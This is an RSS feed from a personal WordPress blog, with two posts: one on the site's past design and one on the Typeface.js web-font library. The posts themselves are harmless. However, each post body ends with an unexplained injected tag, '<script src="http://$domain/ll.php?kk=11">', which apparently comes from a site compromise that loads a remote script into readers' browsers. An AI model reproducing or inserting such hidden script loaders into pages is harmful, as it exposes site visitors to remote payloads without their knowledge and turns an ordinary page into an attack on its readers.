<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>mukelarvin.com &#187; Web Development</title>
	<atom:link href="http://mukelarvin.com/category/web-development/feed/" rel="self" type="application/rss+xml" />
	<link>http://mukelarvin.com</link>
	<description>Just another WordPress weblog</description>
	<lastBuildDate>Tue, 07 Feb 2012 20:14:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3</generator>
		<item>
		<title>Nostalgia</title>
		<link>http://mukelarvin.com/2009/09/nostalgia/</link>
		<comments>http://mukelarvin.com/2009/09/nostalgia/#comments</comments>
		<pubDate>Sat, 19 Sep 2009 01:33:58 +0000</pubDate>
		<dc:creator>mukelarvin</dc:creator>
				<category><![CDATA[Art I'm not just pretending to like...]]></category>
		<category><![CDATA[Fashion]]></category>
		<category><![CDATA[From the future...]]></category>
		<category><![CDATA[Funny Cats]]></category>
		<category><![CDATA[I have the hots for...]]></category>
		<category><![CDATA[If I Were Rich]]></category>
		<category><![CDATA[Music]]></category>
		<category><![CDATA[Nerdery]]></category>
		<category><![CDATA[Rambles]]></category>
		<category><![CDATA[Saving the Earth]]></category>
		<category><![CDATA[Self Pity]]></category>
		<category><![CDATA[Skateboarding]]></category>
		<category><![CDATA[Video]]></category>
		<category><![CDATA[Web Development]]></category>
		<category><![CDATA[Why I still don't have a girlfriend]]></category>

		<guid isPermaLink="false">http://mukelarvin.com/?p=461</guid>
		<description><![CDATA[Some of you may not know this but this website has existed in one form or another for over 5 years. In terms of &#8220;the internet&#8221; that is pretty long, a year before youtube even. Anyways, this is what the site looked like in what was potentially the best time of my life&#8230;]]></description>
			<content:encoded><![CDATA[<p>Some of you may not know this but this website has existed in one form or another for over 5 years.  In terms of &#8220;the internet&#8221; that is pretty long, a year before youtube even.</p>
<p>Anyways, this is what the site looked like in what was potentially the best time of my life&#8230;<br />
<a class="tt-flickr tt-flickr-Medium" title="Nostalgia" href="http://www.flickr.com/photos/mukelarvin/3933152522/"><img class="alignnone" src="http://farm3.static.flickr.com/2665/3933152522_f8710961cd.jpg" alt="Nostalgia" width="500" height="361" /></a><script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://mukelarvin.com/2009/09/nostalgia/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Font troubles eased by Typeface.js</title>
		<link>http://mukelarvin.com/2008/11/font-troubles-eased-by-typefacejs/</link>
		<comments>http://mukelarvin.com/2008/11/font-troubles-eased-by-typefacejs/#comments</comments>
		<pubDate>Fri, 14 Nov 2008 01:07:39 +0000</pubDate>
		<dc:creator>mukelarvin</dc:creator>
				<category><![CDATA[Nerdery]]></category>
		<category><![CDATA[Rambles]]></category>
		<category><![CDATA[Web Development]]></category>

		<guid isPermaLink="false">http://mukelarvin.com/?p=174</guid>
		<description><![CDATA[I&#8217;m about to talk about nerdy stuff but I&#8217;m going to try to explain it so anyone can understand. In the past I&#8217;ve run into a problem. I would be making a website and I would want to use a neato new font but in order to do so I had to turn the text-using-neato-font [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;m about to talk about nerdy stuff but I&#8217;m going to try to explain it so anyone can understand.</p>
<p>In the past I&#8217;ve run into a problem.  I would be making a website and I would want to use a neato new font but in order to do so I had to turn the text-using-neato-font into an image.</p>
<p>For example, see that &#8220;mukelarvin.com&#8221; up at the top beside the cannon?  Notice how you can&#8217;t highlight, copy/paste that text?  That&#8217;s because it&#8217;s a picture.  If I just wrote &#8220;mukelarvin.com&#8221; in the code and said &#8220;use neato-font&#8221; the website would look correct on my computer but not on yours.  That is because I have the neato-font on my computer but you probably don&#8217;t have it on your computer.</p>
<p>So I would go into Photoshop or something, write the text I needed using the neato-font and save that as a picture.  This works.  Your computer downloads the picture and everything looks nice.</p>
<p>The downside of this technique is that any time you want to change the text you have to load up Photoshop, remake the image and upload the image to the website.  If you have a lot of text that changes often it becomes super annoying.</p>
<p>Today I read about <a href="http://typeface.neocracy.org/">Typeface.js</a>, a script that uses your browser&#8217;s drawing abilities to draw the text in whatever font you want.  Neato.</p>
<p>However there are still a few hiccups.  One is that you can&#8217;t use CSS :hover effects. (Which makes text change when you place the mouse cursor over it.)</p>
<p>Basically making Typeface.js only good for headlines and such, which don&#8217;t usually change often and are easily made into images.  I pretty much wasted your time just now.</p>
<p><script type="text/javascript" src="includes/typeface-0.11.js"></script><br />
<script type="text/javascript" src="includes/fabulous_50s_normal.typeface.js"></script></p>
<div class="neato" style="font-size: 70px; font-family: 'Fabulous 50s'">
      Neato!!!
    </div>
<p>(Fabulous 50s font, 70px.)</p>
<p><script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://mukelarvin.com/2008/11/font-troubles-eased-by-typefacejs/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

